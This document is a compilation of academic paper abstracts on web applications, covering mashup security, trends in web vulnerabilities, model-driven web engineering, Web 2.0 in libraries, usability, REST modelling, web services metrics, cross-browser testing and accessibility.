Abstract: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms).

Abstract: Web applications have become important services in our daily lives. Millions of users use web applications to obtain information, perform financial transactions, have fun, socialize, and communicate. Unfortunately, web applications are also frequently targeted by attackers. Recent data from SANS institute estimates that up to 60% of Internet attacks target web applications. In this paper, we perform an empirical analysis of a large number of web vulnerability reports with the aim of understanding how input validation flaws have evolved in the last decade. In particular, we are interested in finding out if developers are more aware of web security problems today than they used to be in the past. Our results suggest that the complexity of the attacks have not changed significantly and that many web problems are still simple in nature. Hence, despite awareness programs provided by organizations such as MITRE, SANS Institute and OWASP, application developers seem to be either not aware of these classes of vulnerabilities, or unable to implement effective countermeasures. Therefore, we believe that there is a growing need for languages and application platforms that attack the root of the problem and secure applications by design.

Abstract: Business Intelligence Applications and the Web: Models, Systems and Technologies summarizes current research advances in BI and the Web, emphasizing research solutions, techniques, and methodologies which combine both areas in the interest of building better BI solutions. This comprehensive collection aims to emphasize the interconnections that exist among the two research areas and to highlight the benefits of combined use of BI and Web practices, which so far have acted rather independently, often in cases where their joint application would have been sensible.

Abstract: Model-driven development has become more and more important in the last few years. In the context of web application development, many web Engineering methods that propose model-driven development processes have appeared. However, earlier stages of these processes are seldom considered and few of these methods rigorously face the problems of specifying web application requirements and translating them into the proper conceptual model. However, it is widely recognized that requirements engineering activities are essential to obtain quality software products.This article surveys Model-driven web engineering methods in a comparative study and analyzes the techniques proposed for specifying functional, data and navigational requirements as well as the mechanisms provided for automatically translating these requirements into conceptual models. Our main goal is to provide a critical view of the support that is provided by these methods for handling web application requirements in order to show their current limitations and strengths.

Abstract: The World Wide Web has evolved from a simple document browsing and distribution environment into a rich software platform in which desktop-style applications are increasingly becoming first class citizens. The document-oriented origins of the Web are still evident in many areas, though, and traditionally it has been difficult to compose truly interactive web applications without using plug-in components or browser extensions such as Flash. However, the ongoing standardization work and emerging technologies such as HTML5, JavaScript 2.0 and WebGL are quickly altering the landscape of web application development. In this paper, we present a number of prior challenges and shortcomings, and describe how new technologies can be used for solving many of the problems. The research is based on our hands-on experiences in building various web-based systems in which a number of different web application development technologies have been used extensively.

Abstract: Today’s Web provides many different functionalities, including communication, entertainment, social networking, and information retrieval. In this article, we analyze traces of HTTP activity from a large enterprise and from a large university to identify and characterize Web-based service usage. Our work provides an initial methodology for the analysis of Web-based services. While it is nontrivial to identify the classes, instances, and providers for each transaction, our results show that most of the traffic comes from a small subset of providers, which can be classified manually. Furthermore, we assess both qualitatively and quantitatively how the Web has evolved over the past decade, and discuss the implications of these changes.

Abstract: Advances in Web-based GIS, Mapping Services and Applications is published as part of ISPRS WG IV/5 effort, and aims at presenting (1) Recent technological advancements, e.g., new developments under Web 2.0, map mashups, neogeography and the like; (2) Balanced theoretical discussions and technical implementations; (3) Commentary on the current stages of development; and (4) Prediction of developments over the next decade. Containing 21 contributions from 60 researchers active within ISPRS communities, most of them from academia and some from governments, the book covers a wide range of topics related to the state-of-the-art in web mapping/GIS and geographic information services. The volume is organized in five sections: 1. Analytical and Geospatial Services; 2. Performance; 3. Augmentation and LBS; 4. Collaboration and Decision Making, and 5. Open Standards for Geospatial Services. Supported by a considerable number of technical details and examples, an overall view of the current achievements and progress made in the field of web-based GIS and mapping services is given. The chapters reflect timely and future developments addressing: constant updating of related web and geospatial technologies as well as the revolution of web mapping caused by mainstream IT vendors such as Google, Yahoo and Microsoft; increased interest from industry on geo-spatial information technologies; and increasing demand from the general public for prompt and effective spatial information services. Advances in Web-based GIS, Mapping Services and Applications will appeal to academia and researchers, application specialists and developers, practitioners, and undergraduate and graduate students interested in distributed and web-based geoinformation systems and applications, geodatabases, and digital mapping.

Abstract: Proliferation of mobile handheld devices and the significant advancement of wireless technologies and infrastructures have become a strong driving force of many mobile applications, including ubiquitous web information access through those devices. Despite the tremendous flexibility, accessibility, and convenience, rendering and navigating Web content on handheld devices suffer from significant usability problems attributable to their physical constraints, especially the small screen size, restricted interaction mechanisms, and low memory. Therefore, improving the effectiveness of web content navigation on those devices is crucial and has attracted increasing attention from both academics and industry. One of the promising solutions is adaptation, which focuses on the content restructuring, rearranging, and visualization. This article attempts to provide a comprehensive review of the state-of-the-art approaches to web adaptation for mobile handheld devices. The study not only categorizes, synthesizes, and...

Abstract: In the field of Cyber Physical Systems and Pervasive Computing, physical resources and web resources can be easily handled and seamlessly integrated into our life. However, due to the heterogeneity of devices and tight coupling of individual information systems, the developers cannot easily create their specific applications by combining with physical and web resources. In this paper, we proposed Rest Thing which is a restful web service infrastructure based on REST principles in order to hide the heterogeneity of devices and provide a seamless way to integrate embedded devices with existing web applications. Besides, we implemented a prototyping system, which provided the restful accessible way of the wireless sensors, and built a demo application on the smart phone to collect and merge physical and web resources. Finally, we gave the performance evaluation of the prototyping system.

Abstract: Web services are a new technology that enables to integrate applications running on different platforms by using primarily XML to enable communication among different computers over the Internet. Large number of applications was designed as stand alone systems before the concept of Web services was introduced and it is a challenge to integrate them into larger computational networks. A generally applicable method of wrapping stand alone applications into Web services was developed and is described. To test the technology, it was applied to the QikProp for DOS (Windows). Although performance of the application did not change when it was delivered as a Web service, this form of deployment had offered several advantages like simplified and centralized maintenance, smaller number of licenses, and practically no training for the end user. Because by using the described approach almost any legacy application can be wrapped as a Web service, this form of delivery may be recommended as a global alternative to traditional deployment solutions.

Abstract: Rich Internet Applications (RIAs) are widely adopted Web applications that add the richer interaction,presentation, and client-side computation capabilities of desktop applications to the Web However, the evolutionfrom Web applications towards RIAs comes at the cost of increased complexity in their development For thisreason, a wide variety of tools and technologies have been proposed in order to streamline their developmenteffort This paper investigates the current state of the art of the RIA development approaches The review showsthat the current industrial development practice lacks a comprehensive approach to RIA development, supportingall the development steps from the design to implementation, test and maintenance, and helping identifying correctdesign choices This is in part due to the severe fragmentation of current RIA technologies that prevents theadoption of a commonly recognized set of best practices resulting in ad-hoc development processes These aspectsare in part treated by research methodologies and some innovative industrial solutions, but also these approachespresent some limitations The paper identifies future research directions for RIAs to fully support theirdevelopment process and to support their design in a more comprehensive and systematic way, from bothindustrial and research perspectives

Abstract: This book addresses the major issues in the Web data management related to technologies and infrastructures, methodologies and techniques as well as applications and implementations. Emphasis is placed on Web engineering and technologies, Web graph managing, searching and querying and the importance of social Web.

Abstract: The Internet, and in particular the World Wide Web, have become one of the most common communication mediums in the World. Millions of users connect everyday to different web-based applications to search for information, exchange messages, interact with each other, conduct business, pay taxes, perform financial operations and many more. Some of these critical web-based services are targeted by several malicious users intending to exploit possible weaknesses and vulnerabilities, which could cause not only the disruption of the service, but also compromise the users and organizations information. Most of the times, these malicious users succeed in exploiting different types of vulnerabilities and the consequences can be disastrous. Most of these vulnerabilities are directly related with the web-based applications lack of quality as a result from a poorly implemented software development life cycle (SDLC). This paper will discuss the direct implication of the lack of security and the importance of quality on the SDLC, and the major factors that influence them. On the other hand the authors propose a set of security automated tools and methodologies that can be used throughout the SDLC as a mean to improve critical web-based applications security and quality.

Abstract: Introduction The history of Internet is not too long and almost all historians are agreed on the fact that the history of Internet starts from ARPANET (Advanced Research Projects Agency NETwork), very first shape of Internet that was developed by DARPANET (Defense Advanced Research Projects Agency). Until 1992, the Internet was available at educational and government institutions. In 1992 the commercial companies started taking up the control of developing this wonderful phenomena. Invention of Internet was a paradigm shift in the history of networks and network communication. In the beginning, static web pages were being created for one way of communication and these pages were read-only for visitors. Hyper Text Markup Language (HTML) was being used widely for web-publishing. This initial form of web was named Web 1.0 later. The term Web 2.0 was being popularized in 2004. Initially this term was used by Darcy DiNucci in 1999. Web 2.0 can be defined in terms of its features and specific technologies, or social impact. In other words, World Wide Web (www) provided the base for Web 2.0 applications to create a new communication environment (Linh, 2008). It is a second wave that covers web tools and services (Macaskill and Owen, 2006). Davis (2005) describes Web 2.0 as an attitude not a technology and Birdsall (2007) believes that Web 2.0 is a social movement. So Web 2.0 applications differ from Web 1.0 applications by their frequency of usage too. As Web 2.0 applications are socially rich and community building is the core of these applications, so their usage increases many times than Web 1.0 static websites/applications. Boateng, Mbtika & Thomas (2010) defines Web 2.0 as a set of trends and tools for using the internet. He further explains that these socio-technological innovations have enabled interactivity and gathering of knowledge through experience and practice on a global scale. The concept of collaborative work, social networking and the ease in the usage of these applications has brought a significant change in the Internet usage style of Internet surfers in the world. The popularity of social networking applications, blogs and sharing of media has also changed the way and behavior of users of libraries all over the world. The concept of Web 2.0 has emerged into other disciplines and changed the entire mode of practices in library science as well and a new concept of Library 2.0 has been introduced. Library 2.0 is the application of interactive, collaborative, and multi-media web-based technologies to web-based library services and collection (Maness, 2006). The real advantage of Library 2.0 can be achieved only by adding advanced functionality and features directly into the content (Abram, 2005). Aharony (2008) has emphasized that the library schools must come up with upgraded curriculum by introducing Web 2.0 course. According to him, Web 2.0 applications may be thoroughly taught as a separate course in the LIS curriculum. It will equip the library professionals with skills and competencies that are necessary to design dynamic and modern user oriented services. A brief description of few Web 2.0 applications is below: Blog (Web Log) is a major application of Web 2.0 era. The blogs are new forms of publication (Maness, 2006). Blogging is an easy process of publishing the ideas on the web and to get the comments from other users of web. This is a one-click process of publishing posts. Blogs are a relatively recent Internet phenomenon dating from the late 1990s (Clyde, 2004). Hane (2001) says that Blogs are a natural for librarians. Libraries all over the world are using blogs for the easy dissemination of information to the targeted users. Blogs are the fastest growing medium of information over World Wide Web. Most of the time, blogs are created as single-person effort but some blogs are created and published as cooperative or group projects (Clyde, 2004). …

Abstract: Research in Web quality has addressed quality in use as the most important factor affecting a wide acceptance of software applications. It can be conceived as comprising two complementary concepts, that is, usability and user experience, which accounts for the employment of more user-centred evaluations. Nevertheless, in the context of Web 2.0 applications, this topic has still not attracted sufficient attention from the HCI community. This paper addresses the quality in use of Web 2.0 applications on the case of mind mapping services. The evaluation methodology brings together three complementary methods. The estimated quality in use is measured by means of the logging actual use method, while the perceived quality in use is evaluated by means of the retrospective thinking aloud (RTA) method and a questionnaire. The contribution of our work is twofold. Firstly, we provide empirical evidence that the proposed methodology in conjunction with the model, set of attributes, and measuring instruments is appropriate for evaluating quality in use of Web 2.0 applications. Secondly, the analysis of qualitative data reveals that performance and effort based attributes considerably contribute to mind mapping services success.

Abstract: HTTP has been the most popular internet protocol for 30 years. Until recently, its role has been limited to a traditional transfer of hypertext documents. However, its flexibility and interoperability cause it to be progressively involved in a much wider range of applications, from video and audio streaming to email, chat and documents editing. Understanding the behavior of modern Web applications is a crucial step to apply QoS or security policies on this traffic. This paper studies 20 popular, Web applications that are representative of 12 application types. We describe a method to isolate and capture browser-generated traffic and plot time series with an RRDTool database. We show that modern Web applications present very diverse traffic patterns, and propose a description and classification of these patterns.

Abstract: Web application development is a complex and time-consuming process that involves different stakeholders (ranging from customers to developers); these applications have some unique characteristics like navigational access to information, sophisticated interaction features, etc. However, there have been few proposals to represent those requirements that are specific to Web applications. Consequently, validation of requirements (e.g., in acceptance tests) is usually informal and as a result troublesome. To overcome these problems, we present WebSpec, a domain-specific language for specifying the most relevant and characteristic requirements of Web applications: those involving interaction and navigation. We describe WebSpec diagrams, discussing their abstraction and expressive power. With a simple though realistic example, we show how we have used WebSpec in the context of an agile Web development approach discussing several issues such as automatic test generation, management of changes in requirements, and improving the understanding of the diagrams through application simulation.

Abstract: The current generation of Web applications (Web 2.0) have made them an outright phenomenon in today’s society helping to redefine the way organisations and individuals communicate and collaborate with each other. The purpose of this paper is to conceptualise the evolution of Web technologies from a user perspective. Based on inference from existing studies, this paper attempts to identify the architectural direction that the next generation (Web 3.0) of Web applications would meld itself into. The paper emphasizes limitations of current Web technologies and how future trends may address these limitations by focusing on migration that has been witnessed in the scope of the applications presented and features delivered on the Web from a users’ perspective.

Abstract: Web Services have emerged as a new web-based technology paradigm for exchanging information on the Internet using platform-neutral standards, such as XML and adopting Internet-based protocols. They have become a promising technology to design and build complex inter-enterprise business applications. However, Web Services are problematic to measure, control, and manage. Software metrics is vital for the management, control, and measurement of software development and despite the vast amount of techniques/mechanisms and metrics for traditional and object-oriented software, there has been a few research and techniques that deals with metrics for Web Services. As companies increasingly invest and relies on Web Services, the importance of metrics for those services continues to grow. In this paper the author present and classify the existing metrics for Web Services, and discussed their usage and benefits. In addition, the author highlight the problems found in using some of the metrics and discussed what is still lacking in this domain.

Abstract: Representational State Transfer (REST), as an architectural style for distributed hypermedia systems, enables scalable operation of the World Wide Web (WWW) and is the foundation for its future evolution. However, although described over 10 years ago, no comprehensive formal model for representing RESTful systems exists. The lack of a formal model has hindered understanding of the REST architectural style and the WWW architecture, consequently limiting Web engineering advancement. In this paper we present a model of RESTful systems based on a finite-state machine formalism. We show that the model enables intuitive formalization of many REST's constraints, including uniform interface, stateless client-server operation, and code-on-demand execution. We describe the model's mapping to a system-level view of operation and apply the model to an example Web application. Finally, we outline benefits of the model, ranging from better understanding of REST to designing frameworks for RESTful system development.

Abstract: Quality in use is comprised of two seemingly different though interlocking concepts: usability and user experience. Consequently, complementary evaluation of pragmatic and hedonic attributes could significantly affect the acceptance of software applications. However, in the context of Web 2.0 applications this topic has still not attracted enough attention from the HCI community. Therefore we present a research aimed at developing a methodology that would facilitate the analysis and comparison of evaluated Web 2.0 applications.

Abstract: Cultural characteristics of users play a significant role in their interactions and understanding of web based systems. Hence consideration of cultural issues in the design of a web based system can improve the usability of such a system. The relation between culture and the internet is symbiotic, that is, experience obtained from using the internet (with its rich cultural diversity) can also have an influence on the local culture. This makes culture a moving target. However to-date, not much research has been done about what cultural issues influence the usability of websites and the level of influence. This paper examines theoretically the cultural issues that influence web design/usability and the significance of this influence to the general usability of a website and also establish how culture can be utilized to develop more usable websites. Thus the main contribution of this study is to identify what characterizes usable websites with reference to cultural needs of the user, specific web features applicable to cultural dimension that can enhance cultural understanding and help web designers to customize the web sites to specific cultures.

Abstract: We present an environment to enable people without programming knowledge to create mashups composed of Web components selected directly from existing Web applications. The authoring environment allows the creation of communication among components originally belonging to different applications. We report on some example application, the underlying architecture of the environment, and a first user test.

Abstract: m Abstract- The Internet, and in particular the World Wide Web, have become one of the most common communication mediums in the World. Millions of users connect everyday to different web-based applications to search for information, exchange messages, interact with each other, conduct business, pay taxes, perform financial operations and many more. Some of these critical web-based services are targeted by several malicious users intending to exploit possible weaknesses and vulnerabilities, which could cause not only the disruption of the service, but also compromise the users and organizations information. Most of the times, these malicious users succeed in exploiting different types of vulnerabilities and the consequences can be disastrous. Most of these vulnerabilities are directly related with the web-based applications lack of quality as a result from a poorly implemented software development life cycle (SDLC). This paper will discuss the direct im plication of the lack of security and the importance of quality on the SDLC, and the major factors that influence them. On the other hand the authors propose a set of security automated tools and methodologies that can be used throughout the SDLC as a mean to improve critical web-based applications security and quality.

Abstract: A large number of health-related Web sites currently exist that offer consumers a wealth of information that can be used to enhance the quality of their lives. Much less attention has been given to Web sites that can support complex health-related problem solving, as opposed to more general information search activities, of user populations such as older adults. In this article, we expand on a prior usability study that examined the performance of 112 older adults who were asked to solve two problems using the U. S. government’s Medicare.gov Web site. The indications from that study were that older adults had difficulty carrying out these problem-solving tasks.This article illustrates, in the context of a case study, the use of a structured methodology for obtaining insights into Web site design issues that could make it difficult for healthcare consumers such as older adults to solve health-related problems. Initially, a number of Web design guidelines that have been developed for older users are presented. The argument is made that such checklist-type guidelines, though essential, are difficult to apply to complex Web-based problem-solving activities. Following a review of research in the area of Web-based health information seeking and problem-solving by older adults, the description and implementation of a methodology for aiding designers in anticipating cognitive demands that older users might confront during their problem-solving activities is presented. Detailed analysis of task performance is then presented to demonstrate that very few of the study participants were able to successfully negotiate the solution to the problem. The use of the methodology for identifying a number user-Web site interaction issues and for proposing recommendations particularly relevant to older users, and ultimately for enhancing the accessibility of health Web sites, is highlighted. Finally, a detailed framework is presented that is intended for guiding designers in the application of this methodology.

Abstract: Cross-browser issues are prevalent in web applications. However, existing tools require considerable manual effort from developers to detect such issues. Our technique and prototype tool - WEBDIFF detects such issues automatically and reports them to the developer. Along with each issue reported, the tool also provides details about the affected HTML element, thereby helping the developer to fix the issue. WEBDIFF is the first technique to apply concepts from computer vision and graph theory to identify cross-browser issues in web applications. Our results show that WEBDIFF is practical and can find issues in real world web applications.

Abstract: Usually, a huge number of tools and proposals help developers assess Accessibility of Web applications; however, looking from the designer perspective, there is no such a similar situation. It seems that creating accessible Web sites is more expensive and complicated than creating Web sites and then assessing/modifying them. Although this feeling may be largely true, the benefits of modeling Accessibility at early design stages outweigh the needs of a developer to implement that Accessibility. A designer can learn the basics of Web Accessibility and then he/she should be able to incorporate this knowledge into his/her software architecture. The point is to have an idea of how to do so from the beginning. In this paper, we briefly introduce our proposal to model Web Accessibility by moving from abstract to concrete architectural views using aspect-orientation. Our approach takes advantages of modeling Accessibility as an aspect-oriented concern, which is independently treated but related to architectural pieces. We illustrate the approach with a case study and elaborate some insights from the designer perspective.